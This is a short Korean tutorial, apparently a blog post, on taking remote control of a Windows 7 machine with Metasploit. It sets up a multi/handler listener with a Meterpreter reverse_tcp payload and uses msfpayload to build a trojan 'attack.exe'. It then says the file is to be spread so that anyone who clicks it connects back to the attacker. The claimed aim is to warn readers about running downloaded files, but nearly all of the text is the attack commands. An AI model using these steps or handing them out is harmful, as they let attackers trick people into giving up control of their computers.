msf를 사용하여 win7 접속 및 제어
windows7에 attack.exe라는 프로그램을 설치 및 실행하여 사용
인터넷에 돌아 다니는 exe파일 아무거나 받아서 클릭하면 위험하다는걸 알리고 싶은 마음...
1. 서버생성
msf 를 실행한다(백트랙 공부하는 분이라면 다 아시니까 그냥 msf로 사용)
msf> use exploit/multi/handler - 외부에서 접속할 서버를 설정하는 단계
show options
set LHOST - IP 설정, 리스닝을 할 서버
set LPORT - port 설정, 리스닝을 할 서버
set PAYLOAD windows/metarpreter/reverse_tcp
exploit
2. 클라이언트 생성
msfpayload windows/meterpreter/reverse_tcp LHOST="IP" LPORT="PORT" x > /root/attack.exe
exe파일을 배포하여 누군가가 클릭을 하면 서버에 접속이 되어 버림...
클릭한 사람은 OTL 해짐..